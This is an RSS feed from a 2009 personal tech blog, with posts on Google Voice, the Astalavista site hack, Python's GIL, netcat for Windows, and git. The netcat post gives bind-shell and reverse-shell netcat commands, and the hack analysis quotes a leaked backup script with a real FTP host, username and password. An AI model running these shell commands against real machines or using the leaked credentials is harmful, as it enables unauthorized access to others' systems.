<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Jon's Blog</title><link>http://joncraton.org/blog</link><description>Thinking and Doing</description><language>en-us</language><lastBuildDate>Sat, 01 Aug 2009 07:38:56 -0600</lastBuildDate><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/joncraton" type="application/rss+xml" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item><title>Google Voice Provides a Lot for Free</title><link>http://feedproxy.google.com/~r/joncraton/~3/prhc_Xn9rpE/google-voice-provides-lot-free</link><description>
&lt;p&gt;I've been using Google Voice for about a month now, and I have been impressed in some ways, but let down in others. If you aren't familiar with it, Google Voice provides you with a phone number that you can configure in a number of ways. For example, the number could be configured to ring your cell phone during the day, and your home phone in the evenings. 
&lt;/p&gt;
&lt;p&gt;Google Voice can perform call screening and provides a lot of features that prevent a phone from constantly interrupting your work flow. When you choose not to answer a call to your Google Voice number, or if you aren't available, the call goes to voice mail. These messages are automatically emailed to you as a short audio clip along with Google's best attempt at converting the audio to text. So, your voice mail messages are actually searchable by keyword. This post is in no way going to cover all of the product's features. For that, you'll want to look at its &lt;a href="http://www.google.com/googlevoice/about.html"&gt;home page&lt;/a&gt;.
&lt;/p&gt;

&lt;h2&gt;Unlimited Cell Calling&lt;/h2&gt;
&lt;p&gt;Google Voice provides a free long distance service. In order to use it, you either need to initiate the call from the web interface, or call your own Google Voice number and then dial the number you wish to be connected to. This alone is a pretty great feature, because it eliminates the need for long distance service on land line phones, but it gets even more interesting with cell phones.
&lt;/p&gt;
&lt;p&gt;If you have a plan with unlimited calling to specific numbers (like Verizon's friend and family numbers), you can simply add your Google Voice number to this list and get unlimited calling to everywhere all the time regardless of how many plan minutes you actually have. It turns out that I am not a lawyer, so I'm not going to promise that doing this doesn't break the terms of service along the way, but it is interesting either way.
&lt;/p&gt;

&lt;h2&gt;Free Dial-up from anywhere in the US&lt;/h2&gt;
&lt;p&gt;In case you don't remember, dial-up gives you the ability to connect to the internet through a standard phone line. That seems archaic and wrong, but it could still have some small use today.
&lt;/p&gt;
&lt;p&gt;Let's say that for some reason, your primary internet connection goes out. Perhaps a gopher chewed through your cable, lightning struck your DSL line, or you get hit with a chrono-EMP that disables all electronic devices created in the last 10 years. Well, with Google Voice and a free dial-up provider, you can still check your email.
&lt;/p&gt;
&lt;p&gt;There are quite a few services that provide free dial-up access. A quick Bing search pointed me toward &lt;a href="http://www.fastfreedialup.com/"&gt;fastfreedialup.com&lt;/a&gt;, &lt;a href="http://dialinfree.net"&gt;dialinfree.net&lt;/a&gt;, and &lt;a href="http://freedialup.org"&gt;freedialup.org&lt;/a&gt;. 
&lt;/p&gt;
&lt;p&gt;You might be wondering what I need Google Voice for if these services are already free. Well, the services themselves are free, but most of them don't provide many local access numbers, meaning the entire call will cost you a long distance fee if you don't have unlimited long distance. However, if you place the call through your Google Voice number, you don't have to worry about long distance charges. 
&lt;/p&gt;
&lt;p&gt;This was a little tricky to get working, so if you are planning to try it, make sure you tell your modem to add pauses at the appropriate points so that each piece of the chain has time to connect. This is usually done by sending a comma (,) to the modem. For example, this worked well for me:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(My GV Number),*,(PIN),2,(Number to dial)#,,,,
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Your mileage may vary, but that worked for me in the one quick test that I did. Dial-up is pretty awful, but it can be useful in a pinch.
&lt;/p&gt;

&lt;h2&gt;SMS Blocking&lt;/h2&gt;
&lt;p&gt;A lot can be said about the price of text messages. They are one of the areas that provide carriers with a huge amount of income for almost no cost. Most entry level cell phone plans charge between $.10 and $.20 for each text message. This can be a pretty hefty cost if you start getting a lot of incoming text messages from people that don't realize that you are getting charged for each one.
&lt;/p&gt;
&lt;p&gt;Google Voice can be pretty helpful here. If you aren't giving out your cell phone number, and instead just give out your Google Voice number, text messages won't come directly to your phone. Google Voice allows you to choose what to do with text messages. They can be forwarded on to your mobile device, or they can simply be sent to your email. I haven't actually tried it, but I think that the forwarding rules for SMS are tied in with those for normal voice calls, so you could even choose which numbers allow texts to be forwarded to your phone.
&lt;/p&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Google Voice can provide a lot of added value for a free service. It is understandable that Apple has decided not to allow Google Voice on the iPhone. It changes a lot by providing unlimited long distance and removing a lot of the hassles of changing providers. You keep your Google Voice number even when you get a new cell plan or move to a new area code, so there isn't as much reason to stick with the same carrier forever.
&lt;/p&gt;
&lt;p&gt;If you'd like to try Google Voice but haven't received an invite yet, I have a few to give away. Shoot me an email, and I'll happily forward one on to you.
&lt;/p&gt;</description><pubDate>Sat, 01 Aug 2009 07:38:56 -0600</pubDate><guid isPermaLink="false">http://joncraton.org/blog/google-voice-provides-lot-free</guid><feedburner:origLink>http://joncraton.org/blog/google-voice-provides-lot-free</feedburner:origLink></item><item><title>Analyzing the Astalavista Hack</title><link>http://feedproxy.google.com/~r/joncraton/~3/AsFsyYOsdf0/analyzing-the-astalavista-hack</link><description>
&lt;p&gt;Several days ago, astalavista.com was torn down by an anti-security group. If you are not familiar with it, astalavista is a "security" community that discusses and hosts vulnerability information and exploits. The site appears to have been completely destroyed by attackers.
&lt;/p&gt;
&lt;p&gt;The attackers posted a text document detailing what they did on the site after they took it down. There is a copy of it hosted &lt;a href="http://pastebin.com/f44ae12cf"&gt;here&lt;/a&gt;. I went ahead and mirrored it &lt;a href="http://joncraton.org/media/files/astalavista.txt"&gt;here&lt;/a&gt; in case the other goes offline for whatever reason.
&lt;/p&gt;
&lt;p&gt;The details of the exploit itself are rather lacking. It appears to be some type of buffer overflow which created a shell through apache on port 80. From there they did some poking around and eventually executed a second exploit which escalated their privs from the apache user up to root.
&lt;/p&gt;
&lt;p&gt;This is already a huge problem, because the box is completely owned. The MySQL database passwords were available in plain text in various php files, so it was quick work to dump these. Root access meant that all the files on the server could be deleted at will. This is a bad situation to get your server into, and the only real way to avoid it is to keep all your services up to date and hope not to get hit by a zero day exploit.
&lt;/p&gt;
&lt;p&gt;The main thing that can be learned from this is the part of the attack that is truly the worst in my mind. The site had offsite backups, but they were unfortunately not being performed in the best way:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
#####################################################################
#                                                                   #
#   incremental backup for astalavista.com                          #
#                                                                   #
#   author:    Paulo M. Santos &amp;lt;paulo.santos@astalavista.com&amp;gt;       #
#                                                                   #
#####################################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;That's bad. They have the ftp host and password in plain text for their offsite backup. This allowed the attacker to log in to the backup server and delete all of the offsite backups as well. The key takeaway here is that if you are doing offsite backups, you should make sure that the two servers are separated in a way that doesn't allow a user who roots one to also destroy the other.
&lt;/p&gt;</description><pubDate>Mon, 08 Jun 2009 15:22:12 -0600</pubDate><guid isPermaLink="false">http://joncraton.org/blog/analyzing-the-astalavista-hack</guid><feedburner:origLink>http://joncraton.org/blog/analyzing-the-astalavista-hack</feedburner:origLink></item><item><title>Python Global Interpreter Lock</title><link>http://feedproxy.google.com/~r/joncraton/~3/-fkKqK_hyG0/python-global-interpreter-lock</link><description>
&lt;p&gt;Some friends and I have been playing around trying to write a game engine in Python. In an effort to avoid premature optimization, the whole thing has been single threaded up until this point. We're all still learning Python and hadn't used it for multithreading anything, but we figured that because it was Python, multithreading would be a simple task. We were right, to an extent.
&lt;/p&gt;
&lt;p&gt;Threading in Python really is a breeze. You simply import threading, create some threads, and start them up. Unfortunately, I coded that up and the game ran slower, even on multicore machines. After looking around the Python docs, I discovered that Python uses a &lt;a href="http://en.wikipedia.org/wiki/Global_Interpreter_Lock"&gt;global interpreter lock&lt;/a&gt;. This means that each Python interpreter can only execute one thread at a time. Threading is basically implemented via time sharing and not real threads. This means that threading doesn't actually give you any concurrency which makes programming much simpler, but it kills performance on multicore machines.
&lt;/p&gt;
&lt;p&gt;The truly unfortunate problem with the GIL is that you can't turn it off. There is no way to tell Python that I really do want it to run multiple interpreter threads and that I am willing to accept the overhead of performing locking on objects. The best workaround for this is to spawn multiple interpreter processes and communicate between them, but this incurs significantly more overhead than threading, and it is more difficult to implement.
&lt;/p&gt;
&lt;p&gt;After posting about this on a tech news site that I use, I learned about &lt;a href="http://code.google.com/p/unladen-swallow/wiki/ProjectPlan"&gt;unladen-swallow&lt;/a&gt;, which is a project that plans to greatly improve the performance of the Python interpreter. Among other things, the unladen-swallow team would like to "remove the GIL and fix the state of multithreading in Python". I hope that this project goes somewhere and eventually becomes a part of Python. Until then, I'm going back to C++.
&lt;/p&gt;</description><pubDate>Mon, 27 Apr 2009 14:00:00 -0600</pubDate><guid isPermaLink="false">http://joncraton.org/blog/python-global-interpreter-lock</guid><feedburner:origLink>http://joncraton.org/blog/python-global-interpreter-lock</feedburner:origLink></item><item><title>Netcat for Windows</title><link>http://feedproxy.google.com/~r/joncraton/~3/FGaH6s5-Xkw/netcat-for-windows</link><description>
&lt;p&gt;Netcat is a simple networking utility which reads and writes data across network connections using the TCP/IP protocol. It's a wonderful tool for debugging all kinds of network problems. It allows you to read and write data over a network socket just as simply as you can read data from stdin or write to stdout. I have put together a few examples of what this can be used to accomplish.
&lt;/p&gt;
&lt;p&gt;Establishing a connection and getting some data over HTTP:
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# nc example.com 80
GET / HTTP/1.0


&amp;lt;HTML&amp;gt;
&amp;lt;!-- site's code here --&amp;gt;
&amp;lt;/HTML&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Creating a shell:
&lt;/p&gt;
&lt;ol&gt;
 &lt;li&gt;
     Remote machine: &lt;code&gt;nc -l 1234 -e /bin/bash&lt;/code&gt;
 &lt;/li&gt;

 &lt;li&gt;
     Local machine: &lt;code&gt;nc remote_machine 1234&lt;/code&gt;
 &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Creating a reverse shell:
&lt;/p&gt;
&lt;ol&gt;
 &lt;li&gt;
     Local machine: &lt;code&gt;nc -l 1234&lt;/code&gt;
 &lt;/li&gt;

 &lt;li&gt;
     Remote machine: &lt;code&gt;nc -e /bin/bash local_machine 1234&lt;/code&gt;
 &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That's all great, but there's really no point in writing another tutorial about netcat. There are several good ones already floating around. This post is actually a story about how this site became what seems to be the most popular source for the Windows version of netcat.
&lt;/p&gt;
&lt;p&gt;For a long time now, I've had a flash drive that I carry around with me that has all sorts of useful utilities on it. Among these is the Windows version of netcat. Unfortunately, several years ago, antivirus vendors decided it would be cool to start flagging netcat as a hack tool and automatically delete it from my flash drive upon insertion. This is easy enough to fix on my own computer by whitelisting netcat, but anytime I would work on another person's computer, the file would still be deleted.
&lt;/p&gt;
&lt;p&gt;This got to be somewhat annoying, especially as the Windows version of netcat became more and more difficult to find. The most recent deletion took several minutes of digging through Google results and broken links in blogs before eventually finding a link that worked. I decided that I didn't want to go through that again, so I threw the file up in my document root and let the &lt;a href="http://www.stuartaxon.com/2008/05/22/netcat-in-windows/"&gt;blogger&lt;/a&gt; whose link actually worked know that I had created a mirror of the file.
&lt;/p&gt;
&lt;p&gt;A few weeks later, I was digging through my Apache logs and noticed that I had an unusually large amount of traffic (I'm sure you are shocked to learn that the traffic from this blog isn't maxing my bandwidth). As I began to look at things more closely, I discovered that I was getting hundreds of hits per day to netcat. The referrer pointed me back to the netcat page on &lt;a href="http://en.wikipedia.org/wiki/Netcat"&gt;wikipedia&lt;/a&gt;. At some point, some wikipedian linked back to the file on my server, and it has been happily serving it ever since. It's a good thing netcat is nice and small.
&lt;/p&gt;

&lt;h3&gt;&lt;a href="http://joncraton.org/media/files/nc111nt.zip"&gt;Download Netcat for Windows&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;EDIT: Rodney Beede has compiled a version without the -e option enabled. This should remove most of the antivirus blocking issues if you don't need that feature. More information, including a download, can be found &lt;a href="http://www.rodneybeede.com/Compile_Netcat_on_Windows_using_MinGW.html"&gt;here&lt;/a&gt;.
&lt;/p&gt;</description><pubDate>Fri, 10 Apr 2009 19:52:48 -0600</pubDate><guid isPermaLink="false">http://joncraton.org/blog/netcat-for-windows</guid><feedburner:origLink>http://joncraton.org/blog/netcat-for-windows</feedburner:origLink></item><item><title>Learning Git</title><link>http://feedproxy.google.com/~r/joncraton/~3/Dm3xXruHO9w/learning-git</link><description>
&lt;p&gt;I've been planning on getting more familiar with &lt;a href="http://git-scm.com/"&gt;git&lt;/a&gt; for several months. Yesterday, I watched the &lt;a href="http://www.youtube.com/watch?v=4XpnKHJAok8"&gt;Google talk&lt;/a&gt; in which Linus Torvalds covered many of the advantages of the tool.
&lt;/p&gt;
&lt;p&gt;I use git for most of my personal stuff because distributed version control is certainly the simplest to use when there is only one person working on the project. It's extremely simple to create a repository. All you need to do is have git installed, and run a few commands.
&lt;/p&gt;
&lt;p&gt;That's about the extent of what I knew how to do with git. I could check things out, commit things back, and do a little reverting if I needed to. That's all simple, and it's often all that I need. However, git really starts to become useful when you get a better understanding of how branching and merging works.
&lt;/p&gt;
&lt;p&gt;I find centralized revision control to be a more intuitive model, but that is probably just because it is what I am familiar with. Distributed systems have no central repository. Each individual who pulls from a repository makes a copy of it on their local machine. Any changes they make can be committed to their local repository. After they finish what they are working on, their repository must be pushed or pulled into another repository. Essentially, everyone gets their own repository, which must eventually be merged back.
&lt;/p&gt;
&lt;p&gt;I was considering explaining the basics of git here, but the &lt;a href="http://book.git-scm.com/"&gt;community book&lt;/a&gt; does a fantastic job of that. This &lt;a href="http://www.eecs.harvard.edu/~cduan/technical/git/"&gt;page&lt;/a&gt; does a pretty good job of explaining how git actually works under the hood.
&lt;/p&gt;</description><pubDate>Thu, 05 Mar 2009 22:34:35 -0600</pubDate><guid isPermaLink="false">http://joncraton.org/blog/learning-git</guid><feedburner:origLink>http://joncraton.org/blog/learning-git</feedburner:origLink></item></channel></rss>
